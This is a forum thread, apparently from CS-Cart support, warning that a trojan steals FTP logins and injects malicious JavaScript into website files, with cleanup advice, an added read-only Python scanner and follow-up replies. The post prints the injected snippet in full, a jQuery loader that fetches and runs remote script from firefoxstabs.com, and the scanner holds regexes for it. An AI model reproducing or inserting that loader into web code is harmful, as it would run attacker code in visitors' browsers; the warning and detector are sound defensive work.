Be careful: Malicious code in JavaScript files

Hello all,



It seems that some dangerous trojan has increased its activity on the Internet recently - it gets access to the user’s local computer, grabs FTP logins and passwords (usually stored in Total Commander) and then adds malicious code to all index and JavaScript files on websites.



The malicious code looks like this:

```html
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
```

(It is usually added to the end of JavaScript files.)

If you have noticed some suspicious behavior of your website or some unknown code in the source code of your pages, please do the following:

- Install a good anti-virus system (if you do not have any) and check your computer, delete all viruses and trojan programs (it is said that the mentioned code can be added via Blackhole Exploit Kit).
- Change all access information to your sites (FTP, Cpanel, administration panel access).
- Add "firefoxstabs.com" to firewall restrictions on your server.
- Use a clean-up script (for example, this one - http://possible.in/products-security-updates.php) to remove the malicious JavaScript from infected files.

I hope this information will help you.

Thank you.

---
Kate Lazarevskaya
CS-Cart Support team
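
A read-only check for the indicators in the snippet above, as an added example that is not part of the original post or CS-Cart's own code: it walks a web root and reports index and JavaScript files that contain the firefoxstabs.com domain or the random-URL `getScript` loader. The broader loader pattern, the sample strings and the `host.invalid` variant are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicator taken from the snippet quoted in the post.
DOMAIN = re.compile(r"firefoxstabs\.com", re.I)
# Assumption (generalisation): any getScript() call whose URL is a quoted
# http(s) prefix plus Math.random(), so a variant on another host is flagged.
LOADER = re.compile(
    r"\.getScript\(\s*['\"]https?://[^'\"]+['\"]\s*\+\s*Math\.random\(\)", re.I)

# Constructed samples: the loader call from the post, and a hypothetical variant.
INJECTED = ("x.getScript('http://firefoxstabs.com/' + "
            "Math.random().toString().substring(3) + '.js');\n")
VARIANT = '$.getScript("http://host.invalid/" + Math.random() + ".js");\n'

def is_target(name):
    """The post says index files and JavaScript files are modified."""
    return name.lower().endswith(".js") or name.lower().startswith("index.")

def scan_text(text):
    """Return the names of the indicators present in one file's contents."""
    found = []
    if DOMAIN.search(text):
        found.append("domain")
    if LOADER.search(text):
        found.append("random-url-loader")
    return found

def scan_tree(root):
    """Walk root; return {relative path: indicators} for flagged files."""
    flagged = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and is_target(path.name):
            found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                flagged[path.relative_to(root).as_posix()] = found
    return flagged

def demo():
    """Scan a constructed sample tree built in a temporary directory."""
    samples = {"js/clean.js": "var a = 1;\n", "js/core.js": "var a = 1;\n" + INJECTED,
               "index.php": "<html></html>\n" + VARIANT, "notes.txt": INJECTED}
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)
```

Point `scan_tree()` at a local copy of the site's document root; it only reads files and changes nothing.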

Is there a way to scan a website?

I know there are many companies offering paid security scan seals, but is there any free service?

[quote name=‘CS-Cart Support team’]

If you have noticed some suspicious behavior of your website or some unknown code in the source code of your pages, please do the following:[/QUOTE]



You can check your website too with:



http://www.virustotal.com/



Attention: there are 2 checks in a row, so please open the popup window for an extra check of your website at the end of the first run.


[quote name=‘CS-Cart Support team’]

  • Add "firefoxstabs.com" to firewall restrictions on your server.[/QUOTE]



This website seems to be offline today:


[QUOTE]This account has been suspended.[/QUOTE]



Always informative, thank you and thank you Lee for the link.